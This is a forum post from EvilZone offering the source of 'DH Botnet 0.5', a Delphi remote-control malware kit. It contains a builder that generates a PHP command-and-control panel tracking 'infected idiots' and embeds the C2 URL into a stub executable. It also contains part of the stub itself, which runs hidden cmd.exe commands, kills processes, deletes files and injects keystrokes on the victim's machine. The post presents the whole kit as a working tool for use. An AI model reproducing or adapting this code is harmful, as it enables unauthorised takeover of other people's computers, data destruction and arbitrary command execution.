EvilZone
Programming and Scripting => Other => : Doddy December 16, 2013, 04:31:10 AM
-
A botnet made in Delphi
Contains the following:
- Command Execution
- List active processes
- Killing processes
- List files in a directory
- Delete a file or directory any
- Read files
- Open and close reading
- Hide and show desktop programs
- Hide Taskbar and display
- Open Word and just type make
- Make the keyboard type only
- Back to the crazy mouse causing it to move around the screen
ScreenShots :
(http://doddyhackman.webcindario.com/images/botnet_menu.jpg)
(http://doddyhackman.webcindario.com/images/botnet_accion.jpg)
Sources :
Generator.
// DH Botnet 0.5
// (C) Doddy Hackman 2013
unit gen;
interface
uses
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
Dialogs, sSkinManager, ComCtrls, sPageControl, sStatusBar, StdCtrls,
sGroupBox,
sEdit, sLabel, sButton, acPNG, ExtCtrls, Madres, IdHash, IdHashMessageDigest;
type
TForm1 = class(TForm)
sSkinManager1: TsSkinManager;
sPageControl1: TsPageControl;
sStatusBar1: TsStatusBar;
sTabSheet1: TsTabSheet;
sTabSheet2: TsTabSheet;
sTabSheet3: TsTabSheet;
sGroupBox1: TsGroupBox;
sEdit1: TsEdit;
sGroupBox2: TsGroupBox;
sEdit2: TsEdit;
sTabSheet4: TsTabSheet;
sGroupBox3: TsGroupBox;
sGroupBox4: TsGroupBox;
sGroupBox5: TsGroupBox;
sGroupBox6: TsGroupBox;
sLabel1: TsLabel;
sEdit3: TsEdit;
sLabel2: TsLabel;
sEdit4: TsEdit;
sLabel3: TsLabel;
sEdit5: TsEdit;
sLabel4: TsLabel;
sEdit6: TsEdit;
sGroupBox7: TsGroupBox;
sButton1: TsButton;
Image1: TImage;
sTabSheet5: TsTabSheet;
sGroupBox8: TsGroupBox;
Image3: TImage;
sLabel6: TsLabel;
sGroupBox9: TsGroupBox;
sLabel5: TsLabel;
sEdit7: TsEdit;
sLabel7: TsLabel;
sEdit8: TsEdit;
sLabel8: TsLabel;
sEdit9: TsEdit;
sGroupBox10: TsGroupBox;
sGroupBox11: TsGroupBox;
Image2: TImage;
sButton2: TsButton;
OpenDialog1: TOpenDialog;
sEdit10: TsEdit;
procedure sButton2Click(Sender: TObject);
procedure sButton1Click(Sender: TObject);
procedure FormCreate(Sender: TObject);
private
{ Private declarations }
public
{ Public declarations }
end;
var
Form1: TForm1;
implementation
{$R *.dfm}
// Functions
procedure savefile(filename, texto: string);
var
ar: TextFile;
begin
try
begin
AssignFile(ar, filename);
FileMode := fmOpenWrite;
if FileExists(filename) then
Append(ar)
else
Rewrite(ar);
Write(ar, texto);
CloseFile(ar);
end;
except
//
end;
end;
function dhencode(texto, opcion: string): string;
// Thanks to Taqyon
// Based on http://www.vbforums.com/showthread.php?346504-DELPHI-Convert-String-To-Hex
var
num: integer;
aca: string;
cantidad: integer;
begin
num := 0;
Result := '';
aca := '';
cantidad := 0;
if (opcion = 'encode') then
begin
cantidad := length(texto);
for num := 1 to cantidad do
begin
aca := IntToHex(ord(texto[num]), 2);
Result := Result + aca;
end;
end;
if (opcion = 'decode') then
begin
cantidad := length(texto);
for num := 1 to cantidad div 2 do
begin
aca := Char(StrToInt('$' + Copy(texto, (num - 1) * 2 + 1, 2)));
Result := Result + aca;
end;
end;
end;
//
procedure TForm1.FormCreate(Sender: TObject);
begin
sSkinManager1.SkinDirectory := ExtractFilePath(Application.ExeName) + 'Data';
sSkinManager1.SkinName := 'neonnight';
sSkinManager1.Active := True;
end;
function md5_encode(const texto: String): String;
var
makemd5: TIdHashMessageDigest5;
begin
makemd5 := TIdHashMessageDigest5.Create;
Result := LowerCase(makemd5.HashStringAsHex(texto));
end;
procedure TForm1.sButton1Click(Sender: TObject);
var
linea: string;
aca: THandle;
code: Array [0 .. 9999 + 1] of Char;
nose: DWORD;
marca_uno: string;
lineafinal: string;
stubgenerado: string;
change: DWORD;
valor: string;
codigo_botnet: string;
begin
codigo_botnet:='<?php'+sLineBreak+
' '+sLineBreak+
'// DH Botnet'+sLineBreak+
'// Version 0.2'+sLineBreak+
'// Coded By Doddy H'+sLineBreak+
' '+sLineBreak+
'// Datos'+sLineBreak+
' '+sLineBreak+
'$username = "ACA_VA_TU_USER";'+sLineBreak+
'$password = "ACA_VA_TU_PASSWORD_EN_MD5";'+sLineBreak+
'$host = "ACA_VA_EL_HOST";'+sLineBreak+
'$userw = "ACA_VA_EL_USER";'+sLineBreak+
'$passw = "ACA_VA_EL_PASS";'+sLineBreak+
'$db = "ACA_VA_EL_NOMBRE";'+sLineBreak+
'$tiempo_de_carga = "ACA_VA_EL_TIEMPO_DE_CARGA";'+sLineBreak+
' '+sLineBreak+
'//'+sLineBreak+
' '+sLineBreak+
'// Start the party'+sLineBreak+
' '+sLineBreak+
'error_reporting(0);'+sLineBreak+
'mysql_connect($host, $userw, $passw);'+sLineBreak+
'mysql_select_db($db);'+sLineBreak+
' '+sLineBreak+
'//'+sLineBreak+
' '+sLineBreak+
'// Registro'+sLineBreak+
'if (isset($_POST[''entradatrasera''])) {'+sLineBreak+
' $key = mysql_real_escape_string($_POST[''key'']);'+sLineBreak+
' $ip = mysql_real_escape_string($_POST[''ip'']);'+sLineBreak+
' $pais = mysql_real_escape_string($_POST[''pais'']);'+sLineBreak+
' $username = mysql_real_escape_string($_POST[''username'']);'+sLineBreak+
' $os = mysql_real_escape_string($_POST[''os'']);'+sLineBreak+
' $timeout = mysql_real_escape_string($_POST[''timeout'']);'+sLineBreak+
' $control = 0;'+sLineBreak+
' $rea = mysql_query("select clave from slaves");'+sLineBreak+
' while ($ver = mysql_fetch_array($rea)) {'+sLineBreak+
' if ($ver[0] == $key) {'+sLineBreak+
' $control = 1;'+sLineBreak+
' }'+sLineBreak+
' }'+sLineBreak+
' if ($control == 0) {'+sLineBreak+
' mysql_query("INSERT INTO slaves(id,clave,ip,pais,user,os,timeout)values(NULL,''$key'',''$ip'',''$pais'',''$username'',''$os'',''$timeout'')");'+sLineBreak+
' mysql_query("INSERT INTO ordenes(id,clave)values(NULL,''$key'')");'+sLineBreak+
' }'+sLineBreak+
'}'+sLineBreak+
'//'+sLineBreak+
'// Bots siguen vivos'+sLineBreak+
'if (isset($_POST[''sigovivo''])) {'+sLineBreak+
' $clave = mysql_real_escape_string($_POST[''clavenow'']);'+sLineBreak+
' mysql_query("UPDATE slaves set estado=''1'' where clave=''$clave''");'+sLineBreak+
'}'+sLineBreak+
'// Bots mandan rta'+sLineBreak+
'if (isset($_POST[''mandocarajo''])) {'+sLineBreak+
' $clave = mysql_real_escape_string($_POST[''miclave'']);'+sLineBreak+
' $rta = mysql_real_escape_string($_POST[''mirta'']);'+sLineBreak+
' mysql_query("UPDATE ordenes set rta=''$rta'' where clave=''$clave''");'+sLineBreak+
'}'+sLineBreak+
'//'+sLineBreak+
'// Ordenes para bots'+sLineBreak+
'if (isset($_POST[''ordenespabots''])) {'+sLineBreak+
' $h = mysql_real_escape_string($_POST[''clave'']);'+sLineBreak+
' $rea = mysql_query("select * from ordenes where clave=''$h''");'+sLineBreak+
' $ver = mysql_fetch_array($rea);'+sLineBreak+
' $id = mysql_real_escape_string($ver[0]);'+sLineBreak+
' $clave = mysql_real_escape_string($ver[1]);'+sLineBreak+
' $orden = mysql_real_escape_string($ver[2]);'+sLineBreak+
' $arg1 = mysql_real_escape_string($ver[3]);'+sLineBreak+
' $arg2 = mysql_real_escape_string($ver[4]);'+sLineBreak+
' $arg3 = mysql_real_escape_string($ver[5]);'+sLineBreak+
' $rta = mysql_real_escape_string($ver[6]);'+sLineBreak+
' echo "[+] ID : " . htmlentities($id) . "<br>";'+sLineBreak+
' echo "[+] Clave : " . htmlentities($clave) . "<br>";'+sLineBreak+
' echo "[+] Orden : " . htmlentities($orden) . "<br>";'+sLineBreak+
' echo "[+] Arg1 : " . htmlentities($arg1) . "<br>";'+sLineBreak+
' echo "[+] Arg2 : " . htmlentities($arg2) . "<br>";'+sLineBreak+
' echo "[+] Arg3 : " . htmlentities($arg3) . "<br>";'+sLineBreak+
' echo "[+] Rta : " . htmlentities($rta) . "<br>";'+sLineBreak+
'}'+sLineBreak+
'//'+sLineBreak+
'// Main'+sLineBreak+
'elseif (isset($_COOKIE[''portal''])) {'+sLineBreak+
' colores();'+sLineBreak+
' $st = base64_decode($_COOKIE[''portal'']);'+sLineBreak+
' $plit = preg_split("/@/", $st);'+sLineBreak+
' $user = $plit[0];'+sLineBreak+
' $pass = $plit[1];'+sLineBreak+
' if ($user == $username and $pass == $password) {'+sLineBreak+
' echo "<title>DH Botnet 0.2</title>";'+sLineBreak+
' if (isset($_POST[''instalar''])) {'+sLineBreak+
' $todo = "'+sLineBreak+
'create table slaves ('+sLineBreak+
'id int(10) UNSIGNED NOT NULL AUTO_INCREMENT,'+sLineBreak+
'clave TEXT NOT NULL,'+sLineBreak+
'ip TEXT NOT NULL,'+sLineBreak+
'pais TEXT NOT NULL,'+sLineBreak+
'user TEXT NOT NULL,'+sLineBreak+
'os TEXT NOT NULL,'+sLineBreak+
'timeout TEXT NOT NULL,'+sLineBreak+
'estado TEXT NOT NULL,'+sLineBreak+
'PRIMARY KEY (id)'+sLineBreak+
');'+sLineBreak+
'";'+sLineBreak+
' $todo2 = "'+sLineBreak+
'create table ordenes ('+sLineBreak+
'id int(10) UNSIGNED NOT NULL AUTO_INCREMENT,'+sLineBreak+
'clave TEXT NOT NULL,'+sLineBreak+
'orden TEXT NOT NULL,'+sLineBreak+
'arg1 TEXT NOT NULL,'+sLineBreak+
'arg2 TEXT NOT NULL,'+sLineBreak+
'arg3 TEXT NOT NULL,'+sLineBreak+
'rta TEXT NOT NULL,'+sLineBreak+
'PRIMARY KEY (id)'+sLineBreak+
');'+sLineBreak+
'";'+sLineBreak+
' if (mysql_query($todo)) {'+sLineBreak+
' if (mysql_query($todo2)) {'+sLineBreak+
' echo "<script>alert(''Installed'');</script>";'+sLineBreak+
' }'+sLineBreak+
' } else {'+sLineBreak+
' echo "<script>alert(''Error'');</script>";'+sLineBreak+
' }'+sLineBreak+
' }'+sLineBreak+
' if (mysql_num_rows(mysql_query("show tables like ''slaves''"))) {'+sLineBreak+
' // TODO EL CODIGO DEL MENU'+sLineBreak+
' if (isset($_POST[''about''])) {'+sLineBreak+
' echo "'+sLineBreak+
'<center>'+sLineBreak+
' '+sLineBreak+
'<h1>[++] Commands :</h1><br><br>'+sLineBreak+
' '+sLineBreak+
'<h2>'+sLineBreak+
'CMD [command]<br>'+sLineBreak+
'GetProcess<br>'+sLineBreak+
'KillProcess [pid]<br>'+sLineBreak+
'ListDir [directory]<br>'+sLineBreak+
'Delete [file]<br>'+sLineBreak+
'OpenFile [file]<br>'+sLineBreak+
'OpenCD <br>'+sLineBreak+
'CloseCD<br>'+sLineBreak+
'HideIcons<br>'+sLineBreak+
'ShowIcons<br>'+sLineBreak+
'HideTaskbar<br>'+sLineBreak+
'ShowTaskbar<br>'+sLineBreak+
'OpenWord [text]<br>'+sLineBreak+
'SendKeys [text]<br>'+sLineBreak+
'CrazyMouse [time]<br>'+sLineBreak+
'</h2>'+sLineBreak+
'<br><br><br>";'+sLineBreak+
' echo ''<a href="javascript:history.back()"><h1>Back</h1></a></center>'';'+sLineBreak+
' exit(1);'+sLineBreak+
' }'+sLineBreak+
' if (isset($_GET[''borrar''])) {'+sLineBreak+
' $id = $_GET[''borrar''];'+sLineBreak+
' if (is_numeric($id)) {'+sLineBreak+
' if (@mysql_query("delete from slaves where id=''$id''")) {'+sLineBreak+
' if (@mysql_query("delete from ordenes where id=''$id''")) {'+sLineBreak+
' echo "<script>alert(''Deleted'');</script>";'+sLineBreak+
' echo "<META HTTP-EQUIV=''Refresh'' CONTENT=''0;URL=?''>";'+sLineBreak+
' }'+sLineBreak+
' }'+sLineBreak+
' } else {'+sLineBreak+
' echo "<script>alert(''DIE MOTHER FUCKER'');</script>";'+sLineBreak+
' }'+sLineBreak+
' }'+sLineBreak+
' if (isset($_GET[''console''])) {'+sLineBreak+
' $id = $_GET[''console''];'+sLineBreak+
' if (is_numeric($id)) {'+sLineBreak+
' $re = mysql_query("select * from ordenes where id=''$id''");'+sLineBreak+
' $ver = mysql_fetch_array($re);'+sLineBreak+
' echo "<center><br><h1>Console</h1><br>";'+sLineBreak+
' echo "<center><textarea cols=80 rows=40 name=code>";'+sLineBreak+
' echo htmlentities($ver[6]);'+sLineBreak+
' echo "</textarea></center><br>";'+sLineBreak+
' echo ''<a href="javascript:history.back()"><h1>Back</h1></a></center>'';'+sLineBreak+
' // ACTUALIZAR A NADA'+sLineBreak+
' mysql_query("UPDATE ordenes set orden='''',arg1='''',arg2='''',arg3='''',rta='''' where id=" . $id);'+sLineBreak+
' exit(1);'+sLineBreak+
' } else {'+sLineBreak+
' echo "<script>alert(''DIE MOTHER FUCKER'');</script>";'+sLineBreak+
' }'+sLineBreak+
' }'+sLineBreak+
' if (isset($_POST[''mandarcmd''])) { // MUY IMPORTANTE'+sLineBreak+
' $op = mysql_real_escape_string($_POST[''options'']);'+sLineBreak+
' $id = mysql_real_escape_string($_POST[''idiotas'']);'+sLineBreak+
' $orden1 = mysql_real_escape_string($_POST[''cmd1'']);'+sLineBreak+
' $orden2 = mysql_real_escape_string($_POST[''cmd2'']);'+sLineBreak+
' $orden3 = mysql_real_escape_string($_POST[''cmd3'']);'+sLineBreak+
' mysql_query("UPDATE ordenes set orden=''$op'',arg1=''$orden1'',arg2=''$orden2'',arg3=''$orden3'' where id=" . $id);'+sLineBreak+
' $re = mysql_query("select * from slaves where id=''$id''");'+sLineBreak+
' $ver = mysql_fetch_array($re);'+sLineBreak+
' $timeout = $ver[6];'+sLineBreak+
' $timeout = $timeout + $tiempo_de_carga;'+sLineBreak+
' $time = $timeout;'+sLineBreak+
' $timeout = $timeout * 1000;'+sLineBreak+
' echo "<script>alert(''Wait " . htmlentities($time) . " seconds'');</script>";'+sLineBreak+
' echo "'+sLineBreak+
'<script type=\"text/javascript\">'+sLineBreak+
'setTimeout (\"location.href=''?console=$id''\",$timeout);'+sLineBreak+
'</script>'+sLineBreak+
'";'+sLineBreak+
' } //'+sLineBreak+
' echo "'+sLineBreak+
'<br><br>'+sLineBreak+
'<center>'+sLineBreak+
'<h1>Infected idiots</h1>'+sLineBreak+
'<br><br>'+sLineBreak+
'";'+sLineBreak+
' $re = mysql_query("select count(clave) from slaves");'+sLineBreak+
' $ver = mysql_fetch_array($re);'+sLineBreak+
' if ($ver[0] == 0) { //'+sLineBreak+
' echo "<script>alert(''No idiots'');</script>";'+sLineBreak+
' } else {'+sLineBreak+
' $re = mysql_query("select * from slaves");'+sLineBreak+
' echo "'+sLineBreak+
'<table border=1 width=1100>'+sLineBreak+
'<td ><b>ID</b></td><td ><b>Key</b></td><td ><b>IP</b></td><td ><b>Country</b></td><td ><b>Username</b></td><td ><b>OS</b></td><td ><b>Timeout</b></td><td><b>Status</b></td><td><b>Option</b></td><tr>'+sLineBreak+
'";'+sLineBreak+
' $idiotas = array();'+sLineBreak+
' while ($ver = mysql_fetch_array($re)) {'+sLineBreak+
' if ($ver[7] == 1) {'+sLineBreak+
' $estado = "Online";'+sLineBreak+
' } else {'+sLineBreak+
' $estado = "Offline";'+sLineBreak+
' }'+sLineBreak+
' echo "<td >" . htmlentities($ver[0]) . "</td><td >" . htmlentities($ver[1]) . "</td><td >" . htmlentities($ver[2]) . "</td><td >" . htmlentities($ver[3]) . "</td>";'+sLineBreak+
' echo "<td >" . htmlentities($ver[4]) . "</td><td >" . htmlentities($ver[5]) . "</td><td >" . htmlentities($ver[6]) . "</td><td>" . $estado . "<td><a href=?borrar=" . $ver[0] . ">Delete</a></td><tr>";'+sLineBreak+
' $idiotas[] = $ver[0];'+sLineBreak+
' mysql_query("UPDATE slaves set estado='''' where id=" . $ver[0]);'+sLineBreak+
' }'+sLineBreak+
' echo "</table>";'+sLineBreak+
' } //'+sLineBreak+
' echo "<form action='''' method=POST>";'+sLineBreak+
' echo "'+sLineBreak+
' '+sLineBreak+
'<br><br><br><br>'+sLineBreak+
' '+sLineBreak+
'<table>'+sLineBreak+
'<td>'+sLineBreak+
'<b>Idiot :</b>'+sLineBreak+
'</td>'+sLineBreak+
'<td>'+sLineBreak+
'<select name=idiotas>";'+sLineBreak+
' foreach($idiotas as $idiota) {'+sLineBreak+
' echo "<option>" . $idiota . "</option>";'+sLineBreak+
' }'+sLineBreak+
' echo "'+sLineBreak+
'</select>'+sLineBreak+
'</td><tr>'+sLineBreak+
' '+sLineBreak+
'<td><b>Options : </b></td>'+sLineBreak+
'<td><select name=options>'+sLineBreak+
'<option>CMD</option>'+sLineBreak+
'<option>GetProcess</option>'+sLineBreak+
'<option>KillProcess</option>'+sLineBreak+
'<option>ListDir</option>'+sLineBreak+
'<option>Delete</option>'+sLineBreak+
'<option>OpenFile</option>'+sLineBreak+
'<option>OpenCD</option>'+sLineBreak+
'<option>CloseCD</option>'+sLineBreak+
'<option>HideIcons</option>'+sLineBreak+
'<option>ShowIcons</option>'+sLineBreak+
'<option>HideTaskbar</option>'+sLineBreak+
'<option>ShowTaskbar</option>'+sLineBreak+
'<option>OpenWord</option>'+sLineBreak+
'<option>SendKeys</option>'+sLineBreak+
'<option>CrazyMouse</option>'+sLineBreak+
'</select></td><tr>'+sLineBreak+
' '+sLineBreak+
'<td><b>Command 1 : </b></td><td><input type=text name=cmd1></td><tr>'+sLineBreak+
'<td><b>Command 2 : </b></td><td><input type=text name=cmd2></td><tr>'+sLineBreak+
'<td><b>Command 3 : </b></td><td><input type=text name=cmd3></td>'+sLineBreak+
'</table><br>'+sLineBreak+
'<input type=submit name=mandarcmd value=Send> <input type=submit name=about value=Help>'+sLineBreak+
'";'+sLineBreak+
' echo "</form>";'+sLineBreak+
' echo "<br><br><br><br><br><br><br><h2>-- == (C) Doddy Hackman 2013 || Contact : lepuke[at]hotmail[com] || Web : http://doddyhackman.webcindario.com == --</h2>";'+sLineBreak+
' } else {'+sLineBreak+
' echo "'+sLineBreak+
'<center><br><br>'+sLineBreak+
'<form action='''' method=POST>'+sLineBreak+
'<h2>Want to install DH Botnet 0.2 ?</h2><br><br>'+sLineBreak+
'<input type=submit name=instalar value=Install>'+sLineBreak+
'</form>";'+sLineBreak+
' }'+sLineBreak+
' exit(1);'+sLineBreak+
' }'+sLineBreak+
'} elseif (isset($_POST[''login''])) {'+sLineBreak+
' if ($_POST[''user''] == $username and md5($_POST[''passwor'']) == $password) {'+sLineBreak+
' setcookie("portal", base64_encode($_POST[''user''] . "@" . md5($_POST[''passwor''])));'+sLineBreak+
' echo "<script>alert(''Welcome idiot'');</script>";'+sLineBreak+
' echo ''<meta http-equiv="refresh" content=0;URL=>'';'+sLineBreak+
' } else {'+sLineBreak+
' echo "<script>alert(''DIE MOTHER FUCKER DIE'');</script>";'+sLineBreak+
' echo ''<meta http-equiv="refresh" content=0;URL=>'';'+sLineBreak+
' }'+sLineBreak+
'} elseif (isset($_GET[''poraca''])) {'+sLineBreak+
' colores();'+sLineBreak+
' echo "'+sLineBreak+
'<br><h1><center>Login</center></h1>'+sLineBreak+
'<br><br><center>'+sLineBreak+
'<form action='''' method=POST>'+sLineBreak+
'<b>Username : </b><input type=text name=user><br><br>'+sLineBreak+
'<b>Password : </b><input type=password name=passwor><br><br>'+sLineBreak+
'<input type=submit name=login value=Enter><br>'+sLineBreak+
'</form>'+sLineBreak+
'</center><br><br>";'+sLineBreak+
'} else {'+sLineBreak+
' error();'+sLineBreak+
'}'+sLineBreak+
'//'+sLineBreak+
'// Funciones secundarias'+sLineBreak+
'function colores() {'+sLineBreak+
' // Colores'+sLineBreak+
' $color = "#00FF00";'+sLineBreak+
' $fondo = "#000000";'+sLineBreak+
' echo "'+sLineBreak+
' '+sLineBreak+
'<STYLE type=text/css>'+sLineBreak+
' '+sLineBreak+
'body,a:link {'+sLineBreak+
'background-color: $fondo;'+sLineBreak+
'color:$color;'+sLineBreak+
'Courier New;'+sLineBreak+
'cursor:crosshair;'+sLineBreak+
'font: normal 0.7em sans-serif,Arial;'+sLineBreak+
'}'+sLineBreak+
' '+sLineBreak+
'input,textarea,fieldset,select,table,td,tr,option,select {'+sLineBreak+
'font: normal 13px Verdana, Arial, Helvetica,'+sLineBreak+
'sans-serif;'+sLineBreak+
'background-color:$fondo;'+sLineBreak+
'color:$color;'+sLineBreak+
'border: solid 1px $color;'+sLineBreak+
'border-color:$color'+sLineBreak+
'}'+sLineBreak+
' '+sLineBreak+
'a:link,a:visited,a:active {'+sLineBreak+
'color:$color;'+sLineBreak+
'font: normal 10px Verdana, Arial, Helvetica,'+sLineBreak+
'sans-serif;'+sLineBreak+
'text-decoration: none;'+sLineBreak+
'}'+sLineBreak+
' '+sLineBreak+
'</style>'+sLineBreak+
' '+sLineBreak+
'";'+sLineBreak+
'}'+sLineBreak+
'function error() {'+sLineBreak+
' echo ''<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">'+sLineBreak+
'<html><head>'+sLineBreak+
'<title>404 Not Found</title>'+sLineBreak+
'</head><body>'+sLineBreak+
'<h1>Not Found</h1>'+sLineBreak+
'<p>The requested URL was not found on this server.</p>'+sLineBreak+
'</body></html>'';'+sLineBreak+
' exit(1);'+sLineBreak+
'}'+sLineBreak+
'// End'+sLineBreak+
'mysql_close();'+sLineBreak+
'//'+sLineBreak+
' '+sLineBreak+
'// The End ?'+sLineBreak+
' '+sLineBreak+
'?>'+sLineBreak;
codigo_botnet := StringReplace(codigo_botnet, 'ACA_VA_TU_USER', sEdit7.Text,
[rfReplaceAll, rfIgnoreCase]);
codigo_botnet := StringReplace(codigo_botnet, 'ACA_VA_TU_PASSWORD_EN_MD5',
md5_encode(sEdit8.Text), [rfReplaceAll, rfIgnoreCase]);
codigo_botnet := StringReplace(codigo_botnet, 'ACA_VA_EL_HOST', sEdit3.Text,
[rfReplaceAll, rfIgnoreCase]);
codigo_botnet := StringReplace(codigo_botnet, 'ACA_VA_EL_USER', sEdit4.Text,
[rfReplaceAll, rfIgnoreCase]);
codigo_botnet := StringReplace(codigo_botnet, 'ACA_VA_EL_PASS', sEdit5.Text,
[rfReplaceAll, rfIgnoreCase]);
codigo_botnet := StringReplace(codigo_botnet, 'ACA_VA_EL_NOMBRE',
sEdit6.Text, [rfReplaceAll, rfIgnoreCase]);
codigo_botnet := StringReplace(codigo_botnet, 'ACA_VA_EL_TIEMPO_DE_CARGA',
sEdit9.Text, [rfReplaceAll, rfIgnoreCase]);
stubgenerado := 'server_ready.exe';
DeleteFile('index_botnet.php');
savefile('index_botnet.php', codigo_botnet);
lineafinal := '[url]' + sEdit1.Text + '[url]' + '[time]' + sEdit2.Text +
'[time]';
marca_uno := '[63686175]' + dhencode(lineafinal, 'encode') + '[63686175]';
aca := INVALID_HANDLE_VALUE;
nose := 0;
DeleteFile(stubgenerado);
CopyFile(PChar(ExtractFilePath(Application.ExeName) + '/' + 'Data/stub.exe'),
PChar(ExtractFilePath(Application.ExeName) + '/' + stubgenerado), True);
linea := marca_uno;
StrCopy(code, PChar(linea));
aca := CreateFile(PChar(stubgenerado), GENERIC_WRITE, FILE_SHARE_READ, nil,
OPEN_EXISTING, 0, 0);
if (aca <> INVALID_HANDLE_VALUE) then
begin
SetFilePointer(aca, 0, nil, FILE_END);
WriteFile(aca, code, 9999, nose, nil);
CloseHandle(aca);
end;
if not(sEdit10.Text = '') then
begin
try
begin
valor := IntToStr(128);
change := BeginUpdateResourceW
(PWideChar(wideString(ExtractFilePath(Application.ExeName)
+ '/' + stubgenerado)), False);
LoadIconGroupResourceW(change, PWideChar(wideString(valor)), 0,
PWideChar(wideString(sEdit10.Text)));
EndUpdateResourceW(change, False);
sStatusBar1.Panels[0].Text := '[+] Done ';
sStatusBar1.Update;
end;
except
begin
sStatusBar1.Panels[0].Text := '[-] Error';
sStatusBar1.Update;
end;
end;
end
else
begin
sStatusBar1.Panels[0].Text := '[+] Done ';
sStatusBar1.Update;
end;
end;
procedure TForm1.sButton2Click(Sender: TObject);
begin
OpenDialog1.InitialDir := GetCurrentDir;
OpenDialog1.Filter := 'ICO|*.ico|';
if OpenDialog1.Execute then
begin
Image2.Picture.LoadFromFile(OpenDialog1.filename);
sEdit10.Text := OpenDialog1.filename;
end;
end;
end.
// The End ?
Stub.
// DH Botnet 0.5
// (C) Doddy Hackman 2013
// Stub
program stub;
// {$APPTYPE CONSOLE}
{$POINTERMATH ON}
uses
SysUtils, WinInet, Windows, TlHelp32, ShellApi;
var
datos: string;
clave: string;
ip: string;
pais: string;
user: string;
os: string;
url_master: string;
time: string;
code: string;
ordenes_re: string;
ordenes_cmd: string;
ordenes_ar1: string;
ordenes_ar2: string;
ordenes_ar3: string;
var
dir_hide, dir, carpeta, nombrereal, directorio, rutareal, yalisto: string;
registro: HKEY;
ob: THandle;
codex: Array [0 .. 9999 + 1] of Char;
nose: DWORD;
todo: string;
// Functions server
function crazy_mouse(number: string): string;
var
i: integer;
code: string;
begin
code := '';
For i := 1 to StrToInt(number) do
begin
Sleep(1000);
SetCursorPos(i, i);
end;
code := '[?] Crazy Mouse : OK';
Result := code;
end;
function SendKeys(texto: string): string;
// Thanks to Remy Lebeau for the help
var
eventos: PInput;
controlb, controla: integer;
code: string;
begin
code := '';
code := '[?] SendKeys : OK';
GetMem(eventos, SizeOf(TInput) * (Length(texto) * 2));
controla := 0;
for controlb := 1 to Length(texto) do
begin
eventos[controla].Itype := INPUT_KEYBOARD;
eventos[controla].ki.wVk := 0;
eventos[controla].ki.wScan := ord(texto[controlb]);
eventos[controla].ki.dwFlags := KEYEVENTF_UNICODE;
eventos[controla].ki.time := 0;
eventos[controla].ki.dwExtraInfo := 0;
Inc(controla);
eventos[controla].Itype := INPUT_KEYBOARD;
eventos[controla].ki.wVk := 0;
eventos[controla].ki.wScan := ord(texto[controlb]);
eventos[controla].ki.dwFlags := KEYEVENTF_UNICODE or KEYEVENTF_KEYUP;
eventos[controla].ki.time := 0;
eventos[controla].ki.dwExtraInfo := 0;
Inc(controla);
end;
SendInput(controla, eventos[0], SizeOf(TInput));
Result := code;
end;
function escribir_word(texto: string): string;
var
code: string;
begin
code := '';
code := '[?] Word Joke : OK';
ShellExecute(0, nil, PChar('winword.exe'), nil, nil, SW_SHOWNORMAL);
Sleep(5000);
SendKeys(texto);
Result := code;
end;
function cambiar_barra(opcion: string): string;
var
code: string;
begin
code := '';
if (opcion = 'hide') then
begin
ShowWindow(FindWindow('Shell_TrayWnd', nil), SW_HIDE);
code := '[?] Hidden Taskbar : OK';
end
else
begin
ShowWindow(FindWindow('Shell_TrayWnd', nil), SW_SHOWNA);
code := '[?] Show Taskbar : OK';
end;
Result := code;
end;
function cambiar_iconos(opcion: string): string;
var
code: string;
acatoy: THandle;
begin
code := '';
acatoy := FindWindow('ProgMan', nil);
acatoy := GetWindow(acatoy, GW_CHILD);
if (opcion = 'hide') then
begin
ShowWindow(acatoy, SW_HIDE);
code := '[?] Hidden Icons : OK';
end
else
begin
ShowWindow(acatoy, SW_SHOW);
code := '[?] Show Icons : OK';
end;
Result := code;
end;
function listardirectorio(dir: string): string;
var
busqueda: TSearchRec;
code: string;
begin
code := '';
FindFirst(dir + '\*.*', faAnyFile + faDirectory + faReadOnly, busqueda);
code := code + '[?] : ' + busqueda.Name + sLineBreak;
while FindNext(busqueda) = 0 do
begin
code := code + '[?] : ' + busqueda.Name + sLineBreak;
end;
Result := code;
end;
function borraresto(archivo: string): string;
var
code: string;
begin
code := '';
if DirectoryExists(archivo) then
begin
if (RemoveDir(archivo)) then
begin
code := '[?] Directory removed';
end
else
begin
code := '[?] Error';
end;
end;
if FileExists(archivo) then
begin
if (DeleteFile(PChar(archivo))) then
begin
code := '[?] File removed';
end
else
begin
code := '[?] Error';
end;
end;
Result := code;
end;
function matarproceso(pid: string): string;
var
vano: THandle;
code: string;
begin
code := '';
vano := OpenProcess(PROCESS_TERMINATE, FALSE, StrToInt(pid));
if TerminateProcess(vano, 0) then
begin
code := '[?] Kill Process : OK';
end
else
begin
code := '[?] Kill Process : ERROR';
end;
Result := code;
end;
function listarprocesos(): string;
var
conector: THandle;
timbre: LongBool;
indicio: TProcessEntry32;
code: string;
begin
code := '';
conector := CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
indicio.dwSize := SizeOf(indicio);
timbre := Process32First(conector, indicio);
while timbre do
begin
code := code + '[?] Name : ' + indicio.szExeFile + '[?] PID : ' + IntToStr
(indicio.th32ProcessID) + sLineBreak;
timbre := Process32Next(conector, indicio);
end;
Result := code;
end;
function ejecutar(cmd: string): string;
// Credits : Function ejecutar() based in : http://www.delphidabbler.com/tips/61
// Thanks to www.delphidabbler.com
var
parte1: TSecurityAttributes;
parte2: TStartupInfo;
parte3: TProcessInformation;
parte4: THandle;
parte5: THandle;
control2: Boolean;
contez: array [0 .. 255] of AnsiChar;
notengoidea: Cardinal;
fix: Boolean;
code: string;
begin
code := '';
with parte1 do
begin
nLength := SizeOf(parte1);
bInheritHandle := True;
lpSecurityDescriptor := nil;
end;
CreatePipe(parte4, parte5, @parte1, 0);
with parte2 do
begin
FillChar(parte2, SizeOf(parte2), 0);
cb := SizeOf(parte2);
dwFlags := STARTF_USESHOWWINDOW or STARTF_USESTDHANDLES;
wShowWindow := SW_HIDE;
hStdInput := GetStdHandle(STD_INPUT_HANDLE);
hStdOutput := parte5;
hStdError := parte5;
end;
fix := CreateProcess(nil, PChar('cmd.exe /C ' + cmd), nil, nil, True, 0, nil,
PChar('c:/'), parte2, parte3);
CloseHandle(parte5);
if fix then
repeat
begin
control2 := ReadFile(parte4, contez, 255, notengoidea, nil);
end;
if notengoidea > 0 then
begin
contez[notengoidea] := #0;
code := code + contez;
end;
until not(control2) or (notengoidea = 0);
Result := code;
end;
